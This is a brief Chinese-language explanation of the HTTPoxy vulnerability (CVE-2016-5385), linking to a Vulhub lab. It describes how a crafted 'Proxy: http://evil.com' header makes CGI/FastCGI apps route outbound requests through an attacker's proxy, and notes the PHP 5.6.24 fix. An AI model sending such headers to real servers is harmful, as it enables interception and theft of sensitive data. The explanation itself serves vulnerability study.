HTTPoxy漏洞(CVE-2016-5385)
Vulnhub官方复现教程
https://vulhub.org/#/environments/cgi/httpoxy/
漏洞原理
参考:http://www.laruence.com/2016/07/19/3101.html
简单来说,根据RFC 3875规定,cgi(fastcgi)要将用户传入的所有HTTP头都加上HTTP_
前缀放入环境变量中,而恰好大多数类库约定俗成会提取环境变量中的HTTP_PROXY
值作为HTTP代理地址。于是,恶意用户通过提交Proxy: http://evil.com
这样的HTTP头,将使用缺陷类库的网站的代理设置为http://evil.com
,进而窃取数据包中可能存在的敏感信息。
PHP5.6.24版本修复了该漏洞,不会再将Proxy
放入环境变量中。本环境使用PHP 5.6.23为例。
当然,该漏洞不止影响PHP,所有以CGI或Fastcgi运行的程序理论上都受到影响。